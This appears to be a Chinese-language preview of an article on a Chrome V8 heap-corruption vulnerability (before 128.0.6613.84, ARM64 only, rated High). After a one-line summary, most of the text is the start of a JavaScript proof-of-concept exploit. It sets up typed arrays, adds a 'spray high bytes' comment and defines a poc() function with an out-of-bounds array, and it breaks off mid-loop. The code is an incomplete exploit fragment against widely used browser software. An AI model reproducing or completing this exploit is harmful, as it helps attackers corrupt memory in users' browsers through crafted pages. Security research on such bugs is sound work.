文章预览
简介: 128.0.6613.84之前的谷歌Chrome V8中不恰当的实现让远程攻击者可以通过精心设计的HTML页面对堆损坏进行潜在的攻击。 这是V8中仅在ARM64中出现的漏洞 (Chromium安全级别:高) 代码与分析: var arrx = new Array ( 150 ); arrx[ 0 ] = 1.1 ; var fake = new Uint32Array ( 10 ); fake[ 0 ]= 1 ; fake[ 1 ] = 3 ; fake[ 2 ]= 2 ; fake[ 3 ] = 4 ; fake[ 4 ] = 5 ; fake[ 5 ] = 6 ; fake[ 6 ] = 7 ; fake[ 7 ] = 8 ; fake[ 8 ] = 9 ; var tahir = 0x1 ; function poc ( a ) { var oob_array = new Array ( 5 ); oob_array[ 0 ] = 0x500 ; let just_a_variable = fake[ 0 ]; let another_variable3 = fake[ 7 ]; if (a % 7 == 0 ) another_variable3 = 0xff00000000 ; //spray high bytes another_variable3 = Math .max(another_variable3,tahir); another_variable3 = another_variable3 >>> 0 ; var index = fake[ 3 ]; var for_phi_modes = fake[ 6 ]; let c = fake[ 1 ]; //giant loop for generate
………………………………